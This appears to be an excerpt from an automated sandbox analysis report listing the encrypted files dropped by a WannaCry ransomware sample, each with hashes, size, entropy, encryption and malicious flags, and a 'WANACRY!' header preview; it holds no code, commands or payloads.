                                                  SHA-512:45A4470756F51442A543F21F81E65F295668E350CF94C309BE91B7EF321FBF414E6AEE529DAB8F1A7150E9659124785517AEBD9463A06A2E4E36B9F220578F3D
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):6872
                                                  Entropy (8bit):7.973874521868196
                                                  Encrypted:false
                                                  SSDEEP:192:gsE0nUGTkO88z+9QPw3cPQyaIRvh60U9tRm/re+:BnUGAP8zXh4kC9tRm/1
                                                  MD5:F0FBA1A68AC4F8487C796E56D07B1C7C
                                                  SHA1:505A1F375C1DDF80DB853B10953E2BCDE1ADF038
                                                  SHA-256:3B8B33479403157209DD2654DC33EDD7DD7874AEE4D24E0479B4E6E92D057014
                                                  SHA-512:1B7B6E25BE2673D29A080A4E7BDD92E56F06C79624F3051E6357CE51D013CE3531C6100002FACABD3CDD0CD9974BE67CAC5152BF009941512E4E448702D7336E
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):122040
                                                  Entropy (8bit):7.998798266026306
                                                  Encrypted:true
                                                  SSDEEP:3072:IMOpYVidkf8nKDTssrWZxe6AXypoNuN1vxcwoBy0r/bgzvL5TBxc:IZpYV0kkK3FqZFpwuN5kr/szvnxc
                                                  MD5:9E228DC8C70B8D4D2A87825198B2C89E
                                                  SHA1:0F760A08E68F1F79335CB539EFEF6A7D2AB82E67
                                                  SHA-256:06578EFFF5B271D7F94291441186236C5EE20D6AE9842259F13993580E0AB4A6
                                                  SHA-512:990BE55B722E762237ADA97F369BBA8B70FF575F6979D91F9B550BEC9F247D4EFC76DA20B3D4216D87CA906EAB11101B7CAB44659C52F3C5FA93F500ECC86715
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):121496
                                                  Entropy (8bit):7.998660357706123
                                                  Encrypted:true
                                                  SSDEEP:3072:3rUS6Uqzgf2gKxJlU8ctEm1SRiZvPh8r6ffAY3HuntBr+69:3wSMEfwxjU1tEGhAuHu7+2
                                                  MD5:BA49BD89752B2C872712AC3BE47EEC73
                                                  SHA1:84DE1278D3B7B4FDF400D22DCB1CA9D8417D3FAA
                                                  SHA-256:67636A7A09C07064161E06D68B57B4B8B0B36840E916577E253330EA29937C9A
                                                  SHA-512:E1ACF23D1D8D0D5AF3256F7439B4AE2BAA51A4E00B72ED51270BEFE77B75219AF7F0D6F252B0F7D2679A98C35E40023E4F6842E49DF6CEFDCF3794E36BFC0EC3
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):65784
                                                  Entropy (8bit):7.997296961858981
                                                  Encrypted:true
                                                  SSDEEP:1536:WLZm/gnFC4iV/czwR9F71sloUI4LAKjaN7BI02Kk6:WLEghiJc0P9uloUI4LAKjaB72U
                                                  MD5:A373FFACD1298403BD4B93590165A584
                                                  SHA1:84593737E386EB90A9AA5FE8C23BF8504F8EFF59
                                                  SHA-256:111D8597817A6A91C38FDD2E57F0EAE1D8C387E49B922DF34C3DE7879F3FF156
                                                  SHA-512:8320C03F00956DD685383C03E7357123086B297787ABDB2D9DE076FE86AD534C59BD4655556E4250F5B833DE9307DC0B9ACCD1775A4E95FE6683BE08858F4F5F
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):45800
                                                  Entropy (8bit):7.995937744072546
                                                  Encrypted:true
                                                  SSDEEP:768:E+gIFLUpnZ7mv45nvvLCTwhVnG1fJuFAA96:EbUC1E45Hn+AAV
                                                  MD5:40BF11A814096E7E5D234495BC5D23A6
                                                  SHA1:EA16977CA2E8D0CEB7839928C895CACD2FB0E322
                                                  SHA-256:B033FCE237DBF0F1B99E25AD3A8827033F01BF6205166D7466E216C788DA6B48
                                                  SHA-512:0D733B61D27D93612175E2610709CE24A6A4FAFA0AC4B05E08385888EF72944DE713B5F7437F3CF346129CAC461B02EF3C91907EA7FD6E0A8CC0863EAD73CE39
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):202536
                                                  Entropy (8bit):7.998912684048249
                                                  Encrypted:true
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):16200
                                                  Entropy (8bit):7.988130625428985
                                                  Encrypted:false
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):49160
                                                  Entropy (8bit):7.9951834510139355
                                                  Encrypted:true
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):40328
                                                  Entropy (8bit):7.995794522066687
                                                  Encrypted:true
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):799560
                                                  Entropy (8bit):7.999801322075106
                                                  Encrypted:true
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):89144
                                                  Entropy (8bit):7.9979869212743875
                                                  Encrypted:true
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):186072
                                                  Entropy (8bit):7.999028499215018
                                                  Encrypted:true
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):17736
                                                  Entropy (8bit):7.990090811555969
                                                  Encrypted:true
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):73912
                                                  Entropy (8bit):7.997634603993111
                                                  Encrypted:true
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):19336
                                                  Entropy (8bit):7.989214822925728
                                                  Encrypted:false
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):20680
                                                  Entropy (8bit):7.990892039491002
                                                  Encrypted:true
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1608
                                                  Entropy (8bit):7.889873012852417
                                                  Encrypted:false
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):37464
                                                  Entropy (8bit):7.99534123291725
                                                  Encrypted:true
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):168968
                                                  Entropy (8bit):7.998861858012997
                                                  Encrypted:true
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):51224
                                                  Entropy (8bit):7.996723736114971
                                                  Encrypted:true
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):69016
                                                  Entropy (8bit):7.9971435479437964
                                                  Encrypted:true
                                                  SSDEEP:1536:IEHB0qJ7/1yx73Ka8vAnCpSFhgPkmBRzKKpQh2CBe3j:PHeM7etngPN6KpFCBe3j
                                                  MD5:A54F8542CDD6E107C8CA1ED474E5D21E
                                                  SHA1:5417D163CCD916463A93512DF9984A57C15DD98C
                                                  SHA-256:2D8959B5644CAFE23F381D7A187F24EA63BC69AB04071C42849CAE907303CF60
                                                  SHA-512:2C84AE9E4151B41690B785BD80321E6B37DA1E8C1D7472470B0DEAFED3C9F353FECBA2EFCB41831787952F3903549B9CD33D460D0776CDC2BF3C709389E342CE
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1573144
                                                  Entropy (8bit):7.999879241096762
                                                  Encrypted:true
                                                  SSDEEP:24576:W8uWKgJdHNGb0uAXu9u7koGAkcT+1FR3eHTlt9Zrt1KFhOJN5omWmpvB:WBg3SdPIkAkPFs5ZrtAOJvXWG
                                                  MD5:10FCBCB268B1339DE976DBAF1E12CE6B
                                                  SHA1:A2F1D696FC4E898B94D65ED884149C6931732B62
                                                  SHA-256:0F3C0044F94B035FE8F69E0FC738799213B597A1BB38B3793C1E800AA2B95946
                                                  SHA-512:3AC4B8D4289C93A4F4C3DFDD9B2375ABE05785AF37D3ABE97ACDA83AF3020FBFCB62B16461F55B6BC5D0DF254510D6884F2C4A79065F52EAF0F70868F6350239
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):2097432
                                                  Entropy (8bit):7.999919868643498
                                                  Encrypted:true
                                                  SSDEEP:49152:a52IdkjJVA55CEPRkIE1iRqEIoEhiY46wKk0rJk:a355fZUnEjOiV/
                                                  MD5:CE521104C93E2F4FD41C5E2855FC938A
                                                  SHA1:1B14832F10EE8B531BC05C8D1B6248D1102BA5CB
                                                  SHA-256:FE069DE726E7F3B1A2053443EA6CFAD95338EEE225B47FD4FCD63579A87995C5
                                                  SHA-512:89821E4EC593B8E2135A08127C9A757592E26B0D3D2F91BD9146720A04F0A3AB01A1F9C303434697A627718BBAD5BAAB448E9E2B951E5A62600AA1FE079B913C
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):38040
                                                  Entropy (8bit):7.995360489278638
                                                  Encrypted:true
                                                  SSDEEP:768:mjgK6vmISu6FKeFaO7fAm8eHdg0d0HBAaZYNkUVoK20AGNlohn/Is:S56v96xNDAm8eHdgC0HLGqTK20JN2h/J
                                                  MD5:B17E17C57A30A5DB340CE8CCF77FF260
                                                  SHA1:836B0815496E755BD359A50AE7C6B25F2A3A2C82
                                                  SHA-256:1EA859E344F2F80395591B35522A74E3AD48BCCD2DC264962C2BF4EFFC391204
                                                  SHA-512:0D6E95564DC321847F36BAD896A28AD847C6C054B202F721C4173FDD66F1B8C008D8F76E843553912D84DECD3194782EBE4CDAAF40833AAA77CF1E45EF29A9C4
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):296
                                                  Entropy (8bit):7.125262859121263
                                                  Encrypted:false
                                                  SSDEEP:6:bkE2eLUBhudLjZdImOs9cmpWKhuyPhKH/jbbAS8P6:bkEHLU/6LFNXEwucYf7AY
                                                  MD5:0E0102EF30A8A09B19B29EB1794D2113
                                                  SHA1:718D2F0150681802C8E97B03143902B6FDD70E3E
                                                  SHA-256:B85ADEF49636CA2821D5F1F828277E398BBE87BE1E6F3FA980D72E2EF7F57BFD
                                                  SHA-512:45117BA1CC78EB4CAE66C1995DA4585F39D578949B952DB9C0A13A1492A03687934EC9224C7ABF87772A2FA40FDFBD0BA036083A70F438E773378350E4818B46
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):296
                                                  Entropy (8bit):7.179284298179416
                                                  Encrypted:false
                                                  SSDEEP:6:bkELhPFOG06gtcVbNSeWhL/aLfN+B0X/cxHseMurUxrd85IxWiM:bkEFPFaebNo/lB0X+MDurUxZ85Ix9M
                                                  MD5:137145BF3D3DD5AE34E1DBABF60EC603
                                                  SHA1:8720690AC646DD29CFE1DDDD9CC9E8DDFB3261CC
                                                  SHA-256:294832BBD39AA7522AA4E0D40B5D95B61703C03EF2D88FA5BF3AF3F962A8B0DC
                                                  SHA-512:FC15C8515B562ED4E6C507B021B66FD48426A84DE8000E042050F796CBA8B292445572E163C94AD46B257DABDD909FE3A1E35EEFA34AABA01A1075BB6805F3FE
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):38040
                                                  Entropy (8bit):7.994866349290046
                                                  Encrypted:true
                                                  SSDEEP:768:UP07JS+WpTGwCFSMz1ZTq4Hjh0U/U1gcfRxXUid6LWj9GRcAxgqgmWF+h4g:4Wh95xRZ/MhxKy56cAxgqAF+h4g
                                                  MD5:6725664808B500996AD01097968D9EFA
                                                  SHA1:9C03C6D447016D05380823B860B06C5C3677EBB5
                                                  SHA-256:C9B1D8FFB20BE451531ED6E71EA68F7E02DFFD9844A95591F0C691A4D59B2C57
                                                  SHA-512:1284671E71D771A2577E04C9178D13835638E58378DDE9965D96DA808BCEB0D73BB591BD2B7B582701E1834AAEFDE76008ADC178E492948699D0079274048EEF
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):38040
                                                  Entropy (8bit):7.99442180691795
                                                  Encrypted:true
                                                  SSDEEP:768:QYJzKY+0gZhJ9CLredbwYaAqOlLQHkKKvhErLsRyK9JObXjNdo+B:QY4YnLreDaYhcfLe9ObQQ
                                                  MD5:56ECFE79CBE829895E3A51E39D133C28
                                                  SHA1:7B8C9DA54FC6B7CF78CD19BD65D18C7BF9E17926
                                                  SHA-256:6A69082DC1E4757C6D1A88C9026500B47541AE8B6582275BB9C7471E1FBF594B
                                                  SHA-512:888D7F9F1225D96913B00C51BAA37D30C1A10E6E8C4D41AF7FAF85353EB2DC25CE695B1A8E378C5C030E8652EE61633C3AC3B05FD22629ADEE384EABF74A7E85
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):296
                                                  Entropy (8bit):7.071208805067209
                                                  Encrypted:false
                                                  SSDEEP:6:bkEvz4fO/ISsQkx2Ah9xm1cU42VBkBwDJr32BgA:bkEBgfQkx90cURV8wDBYv
                                                  MD5:A80183884573E0F8BADA768CA3F0AFD2
                                                  SHA1:7ADDA844AB7FC9423573DB097DFADC3499B396B3
                                                  SHA-256:21CEE0F2C50929D46A9B5CCF1B3DB32391167FD8754A74D01008CDEA40F778AF
                                                  SHA-512:044220319E3BA3F14EE5B8260C7879DD8770447AC948E9F39B6341AF656E2F94986DEE794F9F3A8DA0A5287A21325874BD004442DA9F0B95E112E1309D5A9D19
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):296
                                                  Entropy (8bit):7.17784749605306
                                                  Encrypted:false
                                                  SSDEEP:6:bkESypvfTCFM2vhIMD2p6q9UBXjxIphnDLAQQjlOOg71s66l/R:bkEXvfTCFMADbBXdIphnPsjdX66l5
                                                  MD5:C6B443B620C2242EBE3A503749415CEA
                                                  SHA1:70410C696A99AF440936CBB4C5D91CCCCB3F1595
                                                  SHA-256:2F34DF8B98E9BB0BBAADF7595059ACF9A3E908EACF8DAB15AF4418F5DEA8B6A1
                                                  SHA-512:39489A65EC86507658C704912901FF8A84E1CC13D94B3F1BBC4085DE5DB704F7D85A8F25ADBD5690B46A2BBB7F1106A31670F5934C5A3CD1C41B9E15A7DEB241
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):38040
                                                  Entropy (8bit):7.995291944460258
                                                  Encrypted:true
                                                  SSDEEP:768:K9Iduya5ghwyO5H8Sm9ItP7ThYgDePODTVIg1iOFGl:YIMghwpyKtD1zDMOlhiOFo
                                                  MD5:414C38FC49425AA5CFC59EED77BA3BAA
                                                  SHA1:004848566D9A798036E65C1207E1F2EE12726C5A
                                                  SHA-256:6DBD82544E19C834E2A1596BAA5270C2AEF818BDFF315AB6250E45C70E07766F
                                                  SHA-512:01AEE161FB9581C8AA516AD85B5EE99BD916DDF48E881F65B5A8ED96039FA06537CB8F3F66074FCF0DEAAF3411AB532F65A05AE6626F2693E2418610F1345CA8
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):296
                                                  Entropy (8bit):7.095447632791024
                                                  Encrypted:false
                                                  SSDEEP:6:bkEekFVEj08XKVVYGNwv1jmX8sCAr1yTsa8fogXHc/cPtg:bkEe1I8XKUGNwv1a1184a8f9XHcEPK
                                                  MD5:7DC421D7D01BEF8D4788532E0CEC190E
                                                  SHA1:94C8BF64551FB6D9079FA4AB2CF6512D0A29B378
                                                  SHA-256:01B13EC35157CFB1972600BD9CEB154BABE9AB7D03EE1FCE2D51411E2C31A0A6
                                                  SHA-512:A7D79EC6A7E2C819E832D27435C0D59680E98492AEDB436AFC00B9496DF385843A55E035A9DE1D428BB55261F7B769EEA6BBCD679CBA5F82EFCF149EB2457AB3
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):296
                                                  Entropy (8bit):7.197736713988416
                                                  Encrypted:false
                                                  SSDEEP:6:bkEGiBUg8eCGDrldQAnRFBFvEc3qYmY8ISOKLwYomhH:bkEC3+ldQSRFBFv13qY/8IJKLwo
                                                  MD5:C448AB152837E7E0B6F7B54300EFC69A
                                                  SHA1:4743622931F617822ED346B02EEDD6DC821551B0
                                                  SHA-256:C47FA0D36DB496C143A0BDADEBC4D705F93D7726F765E38C53C48E7FDF7120F9
                                                  SHA-512:51B8C282CD95C69F4A86B549B7DE74DB4E79D3471C5D71C30C32BA7EF4F1011948CB62ADE4905CD1462D611655EAB4330A03D5E948ACDD80BAF1D9CFC2B92741
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1426184
                                                  Entropy (8bit):7.999872830469767
                                                  Encrypted:true
                                                  SSDEEP:24576:nGK6jJ5LsCw9+muSrvE4O1FhxScg5LRh070Ii59qNW+fmaVnq71WVcsvEZCD1OhL:GK6jAC4TjveiNBRh07s59qN1fmqnq71Z
                                                  MD5:73D409807E07B9F78D372B3F1ACBA0A3
                                                  SHA1:00013C43E940E6064DB7A2189CCBA46E4EEB9560
                                                  SHA-256:54FEB3A4BCA0EDB25A3B4D126EFCC4D9DA1DFFB68BF1B2729EB8EFE955091883
                                                  SHA-512:371B005C1F3F2F296A49C5B42870FDF4DDF0E08AC5751F1E598B7E28890C2B7283943C59E2337A15F912A1F1040EBE23BACC98BDB439F0F50B78056242003CB8
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):352008
                                                  Entropy (8bit):7.999443577813371
                                                  Encrypted:true
                                                  SSDEEP:6144:5NNhIDmuHqItN6E2LbaY7LcY0UlrJPyHdi35z1pBEkABXCIJcf5fbj:5ODhHq8N6E0aYc0d6UpbBcjJ+F
                                                  MD5:600554237B50A462CDA07251FA11552B
                                                  SHA1:D4901F0E240548E2F7FDB16B4FE091275BEC9254
                                                  SHA-256:DE03E76B11C7C9F7904B9B342B69A369E4FDAE2CC92B658AEA0E3BE485DCDFEF
                                                  SHA-512:1AADA2C4ED526F5BFDD09325800348D51B49C910B829E5038ED920903D03AE275CC420A77D10955422C788BD8EF3ECC13CEBBCA802E5AE61CCEBF02BE25196AE
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):243784
                                                  Entropy (8bit):7.999279212841311
                                                  Encrypted:true
                                                  SSDEEP:6144:rW5Y82drj5y30OM6zKbXbti9EYXlLs9/4WuET4y/m32gOu:rWa8qrc3u6ohIPloH42m32g1
                                                  MD5:4ED02A856E11E67A95A8A5B1CB674C7C
                                                  SHA1:9A4127BED213906B845FEA489136738ADE2BF463
                                                  SHA-256:DA24EB646E000233AEDF406A80E87CF6940F92D689F2DE93B395CC74E38B39FC
                                                  SHA-512:C26AFD461808E0CBE0C2072FA886D800056DB5AC461BE7C4C8FA771D700AF22EDFCF000851C78E0C9BF37C1E4F88377694F254C2E5726A9CD4F8D37E56079748
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):533032
                                                  Entropy (8bit):7.999698359614149
                                                  Encrypted:true
                                                  SSDEEP:12288:UsRzd9qlwrL0uMPw5rP/r12HB0h2rzwSJkn9zeGrdsy62:Xzp4ZIVwHB0h2rM3njss
                                                  MD5:4DEC3D670ADEFE009000488A6DFEFC99
                                                  SHA1:796DCE1B46826AEDCF697424079F594A204FFA14
                                                  SHA-256:EA8D22C66444A1CBAD225BA947F04B20834DCD233906CDCB2991C45BDF9F2450
                                                  SHA-512:CA285EA26560BEE08903696D3B592E6E28EDFB13CD12401BFD35EF4FE8F355DEBD3298841F0EC77FA7810B8F3AB6997C438530556F701277232E6A0CA76270EC
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY! [encrypted binary content omitted]
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):41416
                                                  Entropy (8bit):7.996067559068154
                                                  Encrypted:true
                                                  SSDEEP:768:XRyNSpZtDNtfGkZIxntFUv/z9ApegKPVXiwIcVb/6yFfjlePX/G1dK2QYPW:nZ9NtfktWBAwJPVXiVcR6ypMPXWKMO
                                                  MD5:DC7BECE225AF85ACC679C465C641B118
                                                  SHA1:49760470B92961FE13E8D9C2FC428798561D4C2B
                                                  SHA-256:B51BB7EA6A5B484486C3BE2B76F34BE8C4961DC16E398319BBACEB0BB0511CB2
                                                  SHA-512:917B26BEC6D02E4C12AE6286BE2E6BB27FCFCAE54C69BEB685FFC5BE7419E402179990E87C8B0D7BBBB7FFE677027C033FE6465487E531F360451051EFEC44D9
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY! [encrypted binary content omitted]
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):104008
                                                  Entropy (8bit):7.998294966174257
                                                  Encrypted:true
                                                  SSDEEP:3072:M4xNlwX3ktPOy0Hk65fo1Tul1BauOivx+G2pLgMPlV:MgNlwX0MnEEgybauOiJQpLPlV
                                                  MD5:0411E63884263162ED0BB6FCB6EBE6FA
                                                  SHA1:3EA982158ABA9002B67DB2FBEF56DC1F16E3DC97
                                                  SHA-256:40764A2C4BBD2DCA53D102CB4AE65EB74248FA593CD62CE257D6DFECB40488AE
                                                  SHA-512:22B9532A4767E62DE26C02683C6FC54FC977EB68685C52D4D270F6431C99A3CD9077E8B99BDE296004D0793DAAC4C97994578421494FF2C8E0DE00213805CAD6
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY! [encrypted binary content omitted]
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):214008
                                                  Entropy (8bit):7.999254386291626
                                                  Encrypted:true
                                                  SSDEEP:3072:plzujDX1cfM7lUcbrStuXtWbaHhO5Zo0nnia4AwHtMXdKTDLx2CQde5:CjDX1cU75rSt4ceHcHia4ThnECd5
                                                  MD5:4A2F90B0A9AFD0230332501F225E0D52
                                                  SHA1:37C89AF34D6A963DED8A323F6AC6B8B333987CB3
                                                  SHA-256:4E4051B15B4080CE2E314CEFFF67CD4DA778FDCE102580FD7ED00C7D08419219
                                                  SHA-512:3A529D2EE9EFA12FB900AA7A2641296391F96294CE1D5823A0A77AC373750A9C1C5E94FF89AF648829155B61EA229357292094DF2594678AE48FEB9C854E5712
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY! [encrypted binary content omitted]
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):296
                                                  Entropy (8bit):7.23512661241246
                                                  Encrypted:false
                                                  SSDEEP:6:bkET+NkoNOhDpK+ETwEXuenjo7EUBp8ijXcglw2ptgl/dSBn:bkET+N7OVpZ6w+u+jo50aMbnlFgn
                                                  MD5:0DFAAB377B7E926C8767173F71974C7D
                                                  SHA1:6A0D12FB8C0AA648CD8AE180C46618F7C0B3338C
                                                  SHA-256:E1D82A1042E01306925BA3766BD7EBA190C1F25D026DDFFDD62354B20CDE20C3
                                                  SHA-512:B652632573777C32CE534686264938C40EB0F33C470922DA052977B0F9690F2D603CC50F42DA3F3C1F48A72A4F3FB2318A1A1FC394499825A58BB22B65611A47
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY! [binary content omitted]
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):296
                                                  Entropy (8bit):7.185703671591206
                                                  Encrypted:false
                                                  SSDEEP:6:bkE581srIJS3ZN2Ut7SlTQsLtRYx5MjOorcWlMDsV:bkE581seS3H52lTQuaQHrcLIV
                                                  MD5:170589C865E43DCA47EB02D22D65F9A6
                                                  SHA1:3A63EE5E1A11964FDF154914ED79CD3DF4DE52B2
                                                  SHA-256:2D189A4A989D36D8D6BC555CA5F0827331F9D845DE7B1787BE4D1AD4A040F712
                                                  SHA-512:1F20A1B28653E9DF453F08F0319F2D3BAE870EC644F4303EEA816868FCB788F116CB59A48795B1C4D06FDF7E2ADB28E2B4171862979D984B28484BEE49C76E3F
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY! [binary content omitted]
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):214008
                                                  Entropy (8bit):7.999152563242
                                                  Encrypted:true
                                                  SSDEEP:6144:80lBSOwDjyN3vOg8A73bgaAskCoeVLl6+3JbTObf2wdnCcr:FbwveZhr1oeFl6+5+
                                                  MD5:1DBF0AEB41734B9A40EE561E4EBC3E9E
                                                  SHA1:D641B18E7800772BBA1D53BECB9477E15E4A0987
                                                  SHA-256:6B73C5C07F8676E5F6F55132F728C732E3510BB62A5DA5A847A062DE7AAF36B7
                                                  SHA-512:F0287B3DFA3E102FEA52BF402D1D6C1DBBA60DC6834EE56FFECE54C1AC9C6589450F3E28B5A28EBD527FAEA43828E61299B302E0480101D234B8AF12DBA84B9F
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY! [encrypted binary content omitted]
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):296
                                                  Entropy (8bit):7.234789229067494
                                                  Encrypted:false
                                                  SSDEEP:6:bkEEs9sKhuGKOb7QPsI9GpwMljWo4GNMGA3yAaRx/9jdr+3BL2rJ6tCYIw5:bkEL9So7QP6T4GNM13yLd9paxE6RX
                                                  MD5:7EE36CD8C7156CA28B0056802401FF27
                                                  SHA1:A5F3B5EEFB655E0889CABAB3D6C0B097A9289589
                                                  SHA-256:4A8359A8662B235DF7715E95CFC2A414F67631B8238A805E120CDB391E0465CD
                                                  SHA-512:1D2E48E65E92A084CBAEA544D60EB79AC2CCD237E555F9B939B12CF59A5A786DB288745B7DB6F5700F853D6913182BCC7EAF82F0D90D7D2A295F23E3588768DB
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY! [binary content omitted]
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):296
                                                  Entropy (8bit):7.149652321786379
